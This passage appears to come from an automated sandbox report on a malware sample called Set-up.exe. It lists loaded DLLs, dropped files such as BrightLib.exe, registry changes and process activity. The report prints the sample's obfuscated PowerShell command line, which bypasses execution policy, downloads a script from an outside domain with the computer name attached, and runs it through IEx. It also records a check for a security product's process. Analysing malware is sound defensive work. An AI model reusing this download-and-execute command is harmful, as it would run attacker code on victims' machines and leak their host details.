              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp Window found: window name: TMainForm
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Set-up.exe Static file information: File size 75269806 > 1048576

              Data Obfuscation

              Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_004716D4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004716D4
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
              Source: 9ONHJ3I0NWFBK4Q0S62.exe.0.dr Static PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
              Source: Set-up.exe Static PE information: section name: .sxdata
              Source: 9ONHJ3I0NWFBK4Q0S62.exe.0.dr Static PE information: section name: .didata
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.dr Static PE information: section name: .didata
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.dr Static PE information: section name: .didata
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0046CA54 pushad ; retf 0046h 0_2_0046CA55
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0046D0C0 push eax; ret 0_2_0046D0EE
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_004597D0 push ecx; mov dword ptr [esp], ecx 0_2_004597D1
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0046BB5C push eax; ret 0_2_0046BB7A
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_006C2F54 pushad ; retf 0_2_006C2F55
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_006BF6DE push eax; mov dword ptr [esp], D2DDDC2Fh 0_2_006BF6DF
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_006C3E94 push ebx; retf 0_2_006C3E95
              Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe File created: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-F9S0P.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp File created: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp File created: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe File created: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp File created: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp File created: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmp

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Set-up.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\Set-up.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exe, Process information set: NOOPENFILEERRORBOX
